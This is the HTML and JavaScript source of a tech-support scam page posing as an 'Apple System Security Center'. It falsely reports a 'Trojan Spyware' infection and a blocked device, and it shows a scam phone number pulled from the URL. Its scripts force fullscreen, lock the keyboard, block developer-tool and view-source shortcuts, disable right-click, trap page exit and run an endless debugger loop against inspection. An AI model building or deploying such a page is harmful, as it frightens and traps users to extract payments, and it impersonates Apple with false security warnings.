<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="stylesheet" href="style.css">
          <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet">
    <script src="style.js"></script>
    <link rel="stylesheet" type="text/css" href="main.css">
    <title>System Security Center Code0x268d3 Services</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="chat2.css">
    <script>
        function jkdhasjkhdgwqhgehkqgweyuodq(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
        var phone = jkdhasjkhdgwqhgehkqgweyuodq('phone');
    </script>
    <script type="text/javascript">
        window.onload = function () {
            document.onclick = function (e) {
                e = e || event;
                target = e.target || e.srcElement;
                if (target.tagName === "DIV") {
                    toggleFullScreen();
                    document.body.style.cursor = 'not-allowed';
                    document.getElementById('map').innerHTML = stroka;
                    document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                } else {
                    toggleFullScreen();
                    document.body.style.cursor = 'not-allowed';
                    document.getElementById('map').innerHTML = stroka;
                    document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                }
            }
        }
    </script>

    
</head>
<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor:none;">

<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="bg1.jpg" alt="" width="100%"/></div>
    <div class="bgimg2" style="top: 0px;"><img src="bg2.jpg" alt="" width="100%" /></div>

</div>
<a href="#" rel="noreferrer" id="link_black" style="cursor: none;">
    <div class="black" style="height: 145%;cursor: none;"></div>
</a>
<div id="ev_talkbox_wrapper" class="ev_talkbox_wrapper_min bounce">
<div class="new_messg">
    <p style=" color: #fff;   margin-top: 8px;
    font-weight: 500;
    font-size: 16px;">Questions? Talk to an expert</p>
    <!-- <p style="font-size: 13px;    position: relative;
    top: -6px;">Chat with our support team</p> -->
</div>
<div id="ev_talkbox_min" class="">
    <span id="ev_min_zoimg"></span>
    <span id="ev_min_title">Chat</span>
</div>
</div>
<div id="chat-box" class="bounce3" style="cursor:none;">
             <img src="logo.png"><span style="color: #222;
        font-size: 21px;
        font-weight: 600;
        margin-left: 6px;
        position: relative;
        top: 5px;">Apple</span> <p style="font-weight: 600;">Contact Apple Support (Toll-Free) Number:</p>
            <h4 style="font-weight: 600;"><script>document.write(phone)</script> <br></h4>
              <div class="arrow-down">
                <i class="fa fa-caret-down"></i>
              </div>
             </div>




<div id="yteuwqtudggsajdgjahs">
    <div class="ilb top">
        <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
            <span id="txtadd" class="fl title"><span class="fl ilb"><img src="def.png" class="logo3"></span> Apple System Security Center</span>
            <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

        </div>
    </div>
    <div id="txtintro">
                <span class="colo-rd">App: Ads.fiancetrack(2).dll<br>
                Threat Detected:  Trojan Spyware</span>
    </div>
    <img id="banner" src="virus-images.jpg">
    <div id="disclaimer">
        Access to this Apple Device has been blocked for security reasons.<br>
        <span class="support">Contact Apple (Toll-Free): <script>document.write(phone)</script></span>
    </div>
    <div id="bottom">
        <img id="badge" src="microsoft.png"><span class="title3">Apple</span>
        <ul>
            <li>
                <a href="#">
                    <div class="fr button2">
                        <span id="addtochromebutton">Deny</span>
                    </div>
                </a>
            </li>
            <li>
                <a href="#">
                    <div class="fr button">
                        <span id="addtochromebutton">Allow</span>
                    </div>
                </a>
            </li>
        </ul>

    </div>
</div>

<div id="pop_up_new" class="cardcontainer" style="cursor: none;">
   <img src="new-scan-white.jpg" class="img-fluid">
    <p style="    padding-bottom: 0px;
    color: #fff;
    font-size: 13px;
    position: absolute;
    bottom: 46px;
    left: 42px;">Contact Apple (Toll-Free) Number: <strong>
            <script>document.write(phone)</script></strong></p>
  
</div>


 <div id="footer">
    <div class="row">

        <div class="col-md-12">
            <div class="right-foot" style="text-align: center;">
                <span id="footertxt"><img src="microsoft.png"></span> <span style="    font-weight: 700;
    padding-left: 0px;
    color: #fff;
    font-size: 23px;">Contact Apple Toll free Number: <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;    margin-right: 4px;"><script>document.write(phone)</script> </span> </span>
    <p>&nbsp;</p>
            </div>
        </div>
       
    </div>


</div> 
<!--sticky footer end-->

<!-- Optional JavaScript; choose one of the two! -->

<!-- Option 1: jQuery and Bootstrap Bundle (includes Popper) -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js" type="text/javascript"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-Piv4xVNRyMGpqkS2by6br4gNJ7DXjqk09RmUpJ8jgGtD7zP9yug3goQfGII0yAns"
        crossorigin="anonymous"></script>
<script type="text/javascript" src="fullscreen.js"></script>
<script type="text/javascript" src="before.js"></script>
<script type="text/javascript" src="main.js"></script>
<script type="text/javascript" src="light.js"></script>
<script type="text/javascript">
    $(function () {
        var jshdjkhasbkqwbbdnmasbeqwhkj = 0;
        var interval = setInterval(function () {
            jshdjkhasbkqwbbdnmasbeqwhkj += 10;
            $("#dynamic")
                .css("width", jshdjkhasbkqwbbdnmasbeqwhkj + "%")
                .attr("aria-valuenow", jshdjkhasbkqwbbdnmasbeqwhkj)
                .text(jshdjkhasbkqwbbdnmasbeqwhkj + "% Complete");
            if (jshdjkhasbkqwbbdnmasbeqwhkj >= 100)
                clearInterval(interval);
        }, 100);
    });
</script>
<script type="text/javascript">
    (function ($) {
        $.fn.countTo = function (options) {
            options = options || {};

            return $(this).each(function () {
                // set options for current element
                var settings = $.extend({}, $.fn.countTo.defaults, {
                    from: $(this).data('from'),
                    to: $(this).data('to'),
                    speed: $(this).data('speed'),
                    refreshInterval: $(this).data('refresh-interval'),
                    decimals: $(this).data('decimals')
                }, options);

                // how many times to update the value, and how much to increment the value on each update
                var loops = Math.ceil(settings.speed / settings.refreshInterval),
                    increment = (settings.to - settings.from) / loops;

                // references & variables that will change with each update
                var self = this,
                    $self = $(this),
                    loopCount = 0,
                    value = settings.from,
                    data = $self.data('countTo') || {};

                $self.data('countTo', data);

                // if an existing interval can be found, clear it first
                if (data.interval) {
                    clearInterval(data.interval);
                }
                data.interval = setInterval(updateTimer, settings.refreshInterval);

                // initialize the element with the starting value
                render(value);

                function updateTimer() {
                    value += increment;
                    loopCount++;

                    render(value);

                    if (typeof (settings.onUpdate) == 'function') {
                        settings.onUpdate.call(self, value);
                    }

                    if (loopCount >= loops) {
                        // remove the interval
                        $self.removeData('countTo');
                        clearInterval(data.interval);
                        value = settings.to;

                        if (typeof (settings.onComplete) == 'function') {
                            settings.onComplete.call(self, value);
                        }
                    }
                }

                function render(value) {
                    var formattedValue = settings.formatter.call(self, value, settings);
                    $self.html(formattedValue);
                }
            });
        };

        $.fn.countTo.defaults = {
            from: 0,               // the number the element should start at
            to: 0,                 // the number the element should end at
            speed: 100,           // how long it should take to count between the target numbers
            refreshInterval: 100,  // how often the element should be updated
            decimals: 0,           // the number of decimal places to show
            formatter: formatter,  // handler for formatting the value before rendering
            onUpdate: null,        // callback method for every time the element is updated
            onComplete: null       // callback method for when the element finishes updating
        };

        function formatter(value, settings) {
            return value.toFixed(settings.decimals);
        }
    }(jQuery));

    jQuery(function ($) {
        // custom formatting example
        $('.count-number').data('countToOptions', {
            formatter: function (value, options) {
                return value.toFixed(options.decimals).replace(/\B(?=(?:\d{3})+(?!\d))/g, ',');
            }
        });

        // start all the timers
        $('.timer').each(count);

        function count(options) {
            var $this = $(this);
            options = $.extend({}, options || {}, $this.data('countToOptions') || {});
            $this.countTo(options);
        }
    });
</script>
<script type="text/javascript">
    $(document).ready(function () {
        $(".pro_box2").delay(1).fadeIn(800);
        $(".pro_box3").delay(1).fadeIn(800);
        $(".pro_box3").delay(1).fadeIn(800);
        $("#pop_up_new").delay(1).fadeIn(800);
        $("#yteuwqtudggsajdgjahs").delay(1).fadeIn(800);
         $("#welcomeDiv").delay(1).fadeIn(800);
         $("#ev_talkbox_wrapper").delay(1).fadeIn(500)
    });
</script>
<script type="text/javascript">
    document.addEventListener('keyup', function (es) {
        if (es.keyCode === 27) {
            toggleFullScreen();
        }
    }, false);
</script>
<script type="text/javascript">
    document.addEventListener('keyup', function (e) {
        if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
            document.getElementById('map').innerHTML = stroka;
            toggleFullScreen();
        }
    }, false);
</script>
<script>
    // Get the modal
    var modal = document.getElementById('myModal');

    // Get the button that opens the modal
    var btn = document.getElementById("myBtn");

    // Get the <span> element that closes the modal
    var span = document.getElementsByClassName("close")[0];

    // When the user clicks the button, open the modal
    /*btn.onclick = function() {
      modal.style.display = "block";
    } */

    // When the user clicks on <span> (x), close the modal
    span.onclick = function () {
        modal.style.display = "none";
    }

    // When the user clicks anywhere outside of the modal, close it
    window.onclick = function (event) {
        if (event.target == modal) {
            modal.style.display = "none";
        }
    }
</script>
<script>
    $(document).ready(function () {
        $("#mycanvas").click(function () {
            $("#welcomeDiv").hide();
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("body").click(function () {
            $("#ev_talkbox_wrapper").hide();
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("body").click(function () {
            $("#footer").delay(100).fadeIn(800);
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("body").click(function () {
            $("#chat-box").delay(100).fadeIn(800)
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("#ev_talkbox_wrapper").click(function () {
            $("#ev_talkbox_wrapper").hide();
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("#mycanvas").click(function () {
            $("#ev_talkbox_wrapper").hide();
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("#mycanvas").click(function () {
            $(".bgimg").hide();
            $(".bgimg2").show();
        });
    });
</script>

<script type="text/javascript">
    $(document).ready(function () {
        $("body").mouseover(function () {
            $("#welcomeDiv").show();
        });
    });
</script>
</body>

<script>
      function play() {
        var audio = document.getElementById("audio");
        audio.play();
      }
 </script>
<script>
navigator.keyboard.lock();
document.onkeydown = function (e) {
return false;
}
</script>
    <script>

    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'I'.charCodeAt(0) || e.keyCode == 'i'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'l'.charCodeAt(0) || e.keyCode == 'l'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'C'.charCodeAt(0) || e.keyCode == 'c'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'J'.charCodeAt(0) || e.keyCode == 'j'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && (e.keyCode == 'U'.charCodeAt(0) || e.keyCode == 'u'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && (e.keyCode == 'S'.charCodeAt(0) || e.keyCode == 's'.charCodeAt(0))) {
            return false;
        }
    }
</script>
<script>
document.addEventListener('contextmenu', event => event.preventDefault());
(function () {
        (function a() {
            try {
                (function b(i) {
                    if (('' + (i / i)).length !== 1 || i % 20 === 0) {
                        (function () { }).constructor('debugger')()
                    } else {
                        debugger
                    }
                    b(++i)
                }
                )(0)
            } catch (e) {
                setTimeout(a, 5)
            }
        }
        )()
    }
    )();
    delete window.console
console.log('test');
</script>

</html>